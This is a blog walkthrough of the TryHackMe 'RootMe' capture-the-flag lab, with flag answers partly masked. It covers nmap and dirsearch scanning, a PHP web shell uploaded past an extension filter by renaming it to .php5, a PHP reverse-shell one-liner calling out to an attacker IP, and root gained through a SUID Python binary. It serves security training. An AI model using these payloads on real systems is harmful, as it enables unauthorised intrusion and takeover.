Hi, my name is Vitalii Rudnykh 👋

Jun 18, 2022

📝 TryHackMe. Walkthrough: RootMe


Task 1.

Just click Start Machine to start.

Answer: Not required.

Task 2.

Scan the machine, how many ports are open? *

Need to scan the server and answer how many ports are open. Solved through Nmap with one command:

$ nmap -A 10.10.254.133
...
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))

-A: Enable OS detection, version detection.

Answer: 2


What version of Apache is running? *.*.**

We take the answer from the output of Nmap.

Answer: 2.*.**


What service is running on port 22? ***

Answer: s**


Find directories on the web server using the GoBuster tool.

Answer: Not required.


What is the hidden directory? /*****/

Here you need to scan the directories of the web server and find the hidden directory. It is suggested to use GoBuster, but I used DirSearch, there is not much difference.

$ python3 dirsearch.py -u http://10.10.254.133/
...
[21:21:01] 200 -  732B  - /panel/
[21:21:20] 200 -  744B  - /uploads/

Enter the answer that matches the pattern.

Answer: /p****/

Task 3.

Find a form to upload and get a reverse shell, and find the flag. user.txt ***{***_***_*_*****}

The file upload form can be found here http://10.10.254.133/panel/. Preparing shell.php and try to upload.

<?php system($_POST['a']); ?>

pic 1

Unfortunately, the form does not allow files with the extension .php. We’ll bypass the extension, try renaming the file to shell.php5 and upload it again.

All files are uploaded to the directory /uploads/.

pic 2

Trying to open it. It works.

Since we know the name of the file that contains the flag, we try to solve the problem with one command.

pic 3

find / -type f -name 'user.txt' -exec cat {} \;

Answer: THM{***_g*t_*_s****}

Task 4.

Search for files with SUID permission, which file is weird? /***/***/******

You need to find a binary file with the SUID permission flag. This flag allows binary files to be run with the permissions of the owner of that file. That is, if the owner of the binary is root, then it will be run as root, even by an other user. Execute the command:

find / -perm -4000

pic 4

Among all the files, seems the most suspicious - /usr/bin/python.

Answer: /usr/bin/p*****


Find a form to escalate your privileges.

Running the reverse shell:

php -r '$sock=fsockopen("10.9.1.210",4242);exec("/bin/sh -i <&3 >&3 2>&3");'

Next, go even deeper down the rabbit hole:

python -c 'import os; os.execl("/bin/sh", "sh", "-p")'

And now we are root.

Answer: Not required.


root.txt ***{********************}

find / -type f -name 'root.txt' -exec cat {} \;

Answer: THM{p*******3_*********0n}